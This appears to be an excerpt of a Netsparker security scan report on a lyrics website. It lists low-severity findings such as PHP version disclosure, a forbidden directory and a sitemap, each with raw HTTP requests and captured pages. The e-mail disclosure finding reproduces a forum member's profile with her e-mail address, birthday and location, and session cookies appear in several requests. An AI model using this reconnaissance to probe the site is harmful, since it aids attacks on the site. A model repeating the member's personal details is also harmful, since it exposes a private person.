font: bold 11px Arial,Helvetica,sans-serif;
padding: 3px 6px 3px 6px;
white-space: nowrap;
}
.vbmenu_control a:link
{
color: #5a5a5a;
text-decoration: none;
}
.vbmenu_control a:visited
{
color: #5a5a5a;
text-decoration: none;
}
.vbmenu_control a:hover, .vbmenu_control a:active
{
color: #5a5a5a;
text-decoration: underline;
}
.vbmenu_popup
{
background-color: #e6e6e6;
color: #5a5a5a;
}
.vbmenu_option
{
background-color: #ffffff;
color: #484848;
font: 11px Arial,Helvetica,sans-serif;
white-space: nowrap;
cursor: pointer;
padding:8px;
}
.vbmenu_option a:link
{
color: #5a5a5a;
text-decoration: none;
}
.vbmenu_option a:visited
{
color: #5a5a5a;
text-decoration: none;
}
.vbmenu_option a:hover, .vbmenu_option a:active
{
color: #5a5a5a;
text-decoration: none;
}
.vbmenu_hilite
{
background-color: #e6e6e6;
color: #5a5a5a;
font: 11px Arial,Helvetica,sans-serif;
white-space: nowrap;
cursor: pointer;
padding:8px;
}
.vbmenu_hilite a:link
{
color: #5a5a5a;
text-decoration: none;
}
.vbmenu_hilite a:visited
{
color: #5a5a5a;
text-decoration: none;
}
.vbmenu_hilite a:hover, .vbmenu_hilite a:active
{
color: #5a5a5a;
text-decoration: none;
}
/* ***** styling for 'big' usernames on postbit etc. ***** */
.bigusername { font-size: 16px;color:#f19403; }

/* ***** small padding on 'thead' elements ***** */
td.thead, div.thead { padding: 4px; }

/* ***** basic styles for multi-page nav elements */
.pagenav a { text-decoration: none; }
.pagenav td { padding: 2px 4px 2px 4px; }

/* ***** define margin and font-size for elements inside panels ***** */
.fieldset { margin-bottom: 6px; }
.fieldset, .fieldset td, .fieldset p, .fieldset li { font-size: 11px; }

/* ***** don't change the following ***** */
form { display: inline; }
label { cursor: default; }
.normal { font-weight: normal; }
.inlineimg { vertical-align: middle; }
table {float:none!important;}
tr {padding:5px 0; }
/*td, th, p, li {padding:5px; }*/
.Section {padding:0 15px; }
.forum_stats {text-align:right;font-size:11px;}

.fl {float:left;}
.fr {float:right;}
.cl {clear:both;}

.fieldset {
border:0 none;
padding:5px 15px 15px 0;
width:345px;
}

#posts {
padding:15px 15px 0 15px;
background:#eeeeee;
border:1px solid #dadada;
margin:0 2px;
border-top:0;
border-bottom:0;
}

.postbit-wrapper {
margin: 0 0 20px 0;
}

.postbit {
margin-left:160px;
}
.postbit_alt {
background:#f7faff;
padding:15px;
border:1px solid #e6e6e6;
border-top:0;
}
.userbit {
padding:0 20px;
width:120px;
float:left;
}
.messagearea {
background:#ffffff;
border:1px solid #dadada;
padding:15px;
}
.controls {

}
.tcatcon {
padding-left:5px;
}



.postbit_userinfo_wrapper {
border:1px solid #e6e6e6;
border-bottom:2px solid #d7d7d7;
}
.postbit_userinfo {
background:#ffffff url(styles/metrolyrics/misc/alt3.gif) repeat-x top;
border:1px solid #ffffff;
padding:15px 25px 10px;
}
.postbit_bubbleimage {
float:left;
margin-top:20px;
}
.postbit_message {
background:#ffffff;
border:1px solid #e6e6e6;
border-bottom:2px solid #d7d7d7;
padding:15px 15px 5px 15px;
margin-left:21px;
min-height:271px;
}
.postbit_controls {
margin-top:15px;
}
.smallerfont {
font-size:10px;
}
.bigusername {
font-size:16px;
color:#f19403;
text-decoration:underline;
}
.bigusername a{
color:#f19403;
text-decoration:underline;
}
.bigusername a:hover {
color:#f19403;
text-decoration:none;
}
.avatarwrap {
background:#afafaf;
color:#FFFFFF;
font-weight:bold;
margin-top:10px;
padding-top:2px;
text-align:center;
width:84px;
}


.vbmenu_option img {
margin-right:5px;
}
.vbmenu_hilite img {
margin-right:5px;
}
.tcat_bg {
background: url(styles/metrolyrics/misc/tcat_bg.gif) no-repeat top left;
height:43px;
padding:2px 15px 0;
color:#ffffff;
text-decoration:none;
font-size:14px;
font-weight:bold;
}
.tcat_bg a {
color:#ffffff;
text-decoration:none;
}
.tcat_bg a:hover {
color:#ffffff;
text-decoration:underline;
}
.tcat_bg_home {
background: url(styles/metrolyrics/misc/tcat_bg.gif) no-repeat top left;
height:32px;
padding:13px 15px 0px 15px;
color:#ffffff;
text-decoration:none;
font-size:14px;
font-weight:bold;
}
.tcat_bg_home a {
color:#ffffff;
text-decoration:none;
}
.tcat_bg_home a:hover {
color:#ffffff;
text-decoration:underline;
}
.tcat_bg_small {
background: url(styles/metrolyrics/misc/tcat_bg.gif) no-repeat top left;
height:32px;
padding:13px 15px 0px 15px;
color:#ffffff;
text-decoration:none;
font-size:14px;
font-weight:bold;
}
.tcat_bg_small a {
color:#ffffff;
text-decoration:none;
}
.tcat_bg_small a:hover {
color:#ffffff;
text-decoration:underline;
}
.tcat_bg_smaller {
background: url(styles/metrolyrics/misc/tcat_bg_smaller.gif) no-repeat top left;
height:32px;
padding:13px 15px 0px 15px;
color:#ffffff;
text-decoration:none;
font-size:14px;
font-weight:bold;
}
.tcat_bg_smaller a {
color:#ffffff;
text-decoration:none;
}
.tcat_bg_smaller a:hover {
color:#ffffff;
text-decoration:underline;
}
.tcat_coll {
float:right;
position:relative;
top:8px;
}
label {
line-height:20px;
}
.inlineimgtop {
vertical-align:top;
}
.tborder2 {
background:#ffffff;
border:1px solid #e6e6e6;
border-bottom:2px solid #d7d7d7;
}
.forumtitle {
color:#f19403!important;
text-decoration:none!important;
font-size:14px;
font-weight:bold;
}
.forumtitle a {
color:#f19403!important;
text-decoration:none!important;
}
.forumtitle:hover {
color:#ea3403;
text-decoration:none;
}

.threadtitle {
color:#f19403;
text-decoration:none;
font-size:12px;
font-weight:bold;
}
.threadtitle a {
color:#f19403;
text-decoration:none;
}
.threadtitle a:hover {
color:#ea3403;
text-decoration:none;
}


.memberlink a {
font-weight:bold;
}
.memberlink a:hover {
text-decoration:underline;
}



.bginput:focus {
background:#fee6ce;
border:1px solid #f7b54d;
}
.fieldset { border:0; }

.padding10 {
padding:6px;
}

.crumbtrail-nav {
padding:5px 10px 5px;
margin-bottom: 15px;
background:#fafafa;
color:#484647!important;
font-weight: bold;
}
.crumbtrail-nav a:link, .crumbtrail-nav_alink, .crumbtrail-navActive a:link, .crumbtrail-navActive_alink
{
font-weight: bold;
text-decoration: none;
color:#F19403!important;
}
.crumbtrail-nav a:visited, .crumbtrail-nav_avisited, .crumbtrail-navActive a:visited, .crumbtrail-navActive_avisited
{
font-weight: bold;
text-decoration: none;
color:#F19403!important;
}
.crumbtrail-nav a:hover, .crumbtrail-nav a:active, .crumbtrail-nav_ahover, .crumbtrail-navActive a:hover, .crumbtrail-navActive a:active, .crumbtrail-navActive_ahover
{
font-weight: bold;
text-decoration: underline;
color:#EA3403!important;
}
.crumbtrail-nav ul {
list-style:none;
margin:0;
padding:0;
font-weight: bold;
}
.crumbtrail-nav ul li {
display:inline;
line-height: normal;
float: none;
font-weight: bold;
}
.crumbtrail-nav ul li a {
text-decoration:none;
float: none;
display: inline;
border: none;
font-size: 1em;
font-weight: normal;
padding: 0;
color:#F19403!important;
}
.crumbtrail-nav ul li.bold a {
font-weight:bold;
color:#F19403;
}
.crumbtrail-nav ul li:HOVER {
background: none;
padding: 0;
}
.crumbtrail-nav ul li:HOVER A{
padding: 0;
}
.crumbtrail-nav ul li a:HOVER {
text-decoration:underline;
background: none;
padding: 0;
}






.tborder3 {
background-color:none;
}
.tcat2 {
background-color:#ffcd74;
color:#dc6f00;
font:bold 10pt Arial,Helvetica,sans-serif;
padding:5px;
}
.alt3 {
background-color:#fff6cf;
color:#5A5A5A;
font-size:12px;
line-height:18px;
padding:10px 5px;
}
.alt3 a {
color:#ea3403;
text-decoration:none;
}
.alt3 a:hover {
color:#ea3403;
text-decoration:underline;
}



select {
padding:2px!important;
color:#616161!important;
border:1px solid #D8D8D8!important;
}

.editor-con td {
padding:2px;
}
#vBulletin_editor {
border:1px solid #e6e6e6!important;
}
#htmlbox {
border:1px inset #e6e6e6!important;
}


blockquote ul {
list-style:none outside none;
margin-left:15px;
padding-top:5px;
}
blockquote ul li {
padding-top:5px;
}
ol {
margin-left:35px;
margin-top:15px;
margin-bottom:15px;
}
-->
</style>

<!-- / CSS Stylesheet -->
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--
var SESSIONURL = "";
var IMGDIR_MISC = "styles/metrolyrics/misc";
// -->
</script>
<script type="text/javascript" src="/js/sumenu.js"></script>



<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<script type="text/javascript" src="/forum/clientscript/vbulletin_global.js"></script>
<script type="text/javascript" src="/forum/clientscript/vbulletin_menu.js"></script>
<link href="/css/g/common.css" rel="stylesheet" type="text/css" media="screen"/>
<script type="text/javascript">
var hasAvatar = true;
//Nav variables
var nav={"isinforum":true};
//end Nav variables

//start comscore tag
var _comscore = _comscore || [];
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-50802-1']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();
// End Google tracking
//-->
</script>
<script type="text/javascript">
<!--//
try {

var pageTracker = _gat._getTracker("UA-50802-1");
pageTracker._setCustomVar(1,"User Group ID",1,2);

var is_dev = 0;

pageTracker._trackPageview();
} catch(err) {}

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>


<!-- no cache headers -->
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="-1" />
<meta http-equiv="Cache-Control" content="no-cache" />
<!-- end no cache headers -->
<title>MetroLyrics - powered by vBulletin</title>

</head>
<body>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460375?"></script>

<div id="header">

<h1>Lyrics Forum</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="t..
PHP Version Disclosure

PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.
- /xml/

/xml/

http://www.metrolyrics.com/xml/

Extracted Version

PHP/5.3.2

Request

GET /xml/ HTTP/1.1
Referer: http://www.metrolyrics.com/xml/justreleased.xml
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460374; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Content-Encoding:
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2
Content-Type: text/html; charset=utf-8
Location: http://www.metrolyrics.com/xml.html
Content-Length: 20
Expires: Mon, 07 Mar 2011 01:12:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Mar 2011 01:12:59 GMT
Connection: keep-alive


Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /iframes/

/iframes/ CONFIRMED

http://www.metrolyrics.com/iframes/

Request

GET /iframes/ HTTP/1.1
Referer: http://www.metrolyrics.com/iframes/footer.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460374; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden
Server: LiteSpeed
Content-Type: text/html
Content-Length: 380
Expires: Mon, 07 Mar 2011 01:12:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Mar 2011 01:12:58 GMT
Connection: keep-alive
Vary: Accept-Encoding


<html><head><title> 403 Forbidden
</title></head><body><h1> 403 Forbidden
</h1>Access to this resource on the server is denied!<hr />Powered By <a href='http://www.litespeedtech.com'>LiteSpeed Web Server</a><br /><font face="Verdana, Arial, Helvetica" size=-1>LiteSpeed Technologies is not responsible for administration and contents of this web site!</font></body></html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /forum/member.php

/forum/member.php

http://www.metrolyrics.com/forum/member.php?u=1223126

Found E-mails

ai.hyu.niey@hotmail.my

Request

GET /forum/member.php?u=1223126 HTTP/1.1
Referer: http://www.metrolyrics.com/top-artists.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=aec9be57297fd02395d7763520c16386
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 7886
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:22:09 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="profile, AiHyu" />
<meta name="description" content="AiHyu's Profile" />
<meta name="keywords" content="Profile" />
<meta property="fb:page_id" content="81914997331" />
<title>AiHyu's Profile</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"isinforum":true},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/user.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_1x1;tile=1;sz=1x1;ord=1299460929?"></script>

<div id="header">

<h1>AiHyu's Profile</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/ROS/ROS_top_728x90;tile=2;sz=728x90;ord=1299460929?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">

<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div class="blueBox">
<div id="panel">

<img src="/forum/customavatars/avatar1223126_1.jpg" alt="AiHyu's Avatar" width="96" />


<span><strong>AiHyu</strong><br />Junior Member</span>
<ul>

<li><a href="private.php" title="Send a Message"><img src="/images/n2/ico-message.jpg" alt="Send a message" />Send Message</a></li>

<li><a href="profile.php" title="Add to Friends"><img src="/images/n2/ico-add2.gif" alt="Add to Friends" />Add to Friends</a></li>

<li>No Forum Posts</li>

</ul>
</div>
</div>
<div class="blueBox">

<h2>About AiHyu</h2>
<div id="about">
<ul>
<li><img src="/images/n2/ico-female.gif" alt="Female" />Female</li>
<li><strong>Location: </strong> Malaysia</li>
<li><strong>Birthday:</strong> October 11, 1994</li>
<li><strong>Bio: </strong>My life is music &amp; i could die without it.I love arts,paintings,movies &amp; more but music is my passion and if somehow i lost my MP4, i would panic and fainted.Every work i do,i did it with music</li>
<li><strong>Hobbies: </strong>Listening to Music,Paint,Sketch,Watch Movies</li>



<li><strong>MSN: </strong> ai.hyu.niey@hotmail.my</li>

</ul>

</div>
</div>
<div class="blueBox">
<h2>AiHyu's Friends (0)</h2>
<div id="friendList">
<ul>
<li style="width: 180px; text-align: left;">AiHyu currently does not have any friends.</li..
Sitemap Identified

Sitemap Identified

1 TOTAL
INFORMATION
Netsparker identified Sitemap file on the target web site. This issue is reported as extra information.

Impact

This issue is reported as extra information, there is no direct impact resulting from this.
- /sitemap.xml

/sitemap.xml

http://www.metrolyrics.com/sitemap.xml

Request

GET /sitemap.xml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460374
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
Accept-Ranges: bytes
ETag: "5ac662-4c72c100-0"
Last-Modified: Mon, 23 Aug 2010 18:42:08 GMT
Content-Type: application/xml
Content-Length: 5949026
Date: Mon, 07 Mar 2011 01:12:54 GMT
Connection: keep-alive


<?xml version="1.0" encoding="UTF-8"?><urlset xmlns="http://www.google.com/schemas/sitemap/0.84" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.google.com/schemas/sitemap/0.84 http://www.google.com/schemas/sitemap/0.84/sitemap.xsd"> <url> <loc>http://www.metrolyrics.com/0100101110-lyrics-artrosis.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/01011001-album-ayreon.html</loc> <priority>0.8</priority> </url> <url> <loc>http://www.metrolyrics.com/02-avalon-remixed-album-avalon.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/02-panic-room-lyrics-riverside.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/0304-album-jewel.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1-2-3-remix-lyrics-gloria-estefan.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1-fille-4-types-album-celine-dion.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1-hits-collection-album-conway-twitty.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1-in-amillon-lyrics-hannah-montana.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1-minute-40-lyrics-antiskeptic.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1-mo-time-lyrics-plies.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1-mo-tome-lyrics-plies.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1-n-1-out-lyrics-tha-dogg-pound.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1-of-6-thing-lyrics-craig-david.html</loc> <priority>1</priority> </url> <url> <loc>http://www.metrolyrics.com/1-on-1-album-rupee.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/1-shot-deal-lyrics-lloyd-banks.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/10-album-brian-mcknight.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/10-album-ll-cool-j.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/10-anni-lyrics-marco-masini.html</loc> <priority>0.4</priority> </url> <url> <loc>http://www.metrolyrics.com/10-cc-lyrics.html</loc> <priority>0.6</priority> </url> <url> 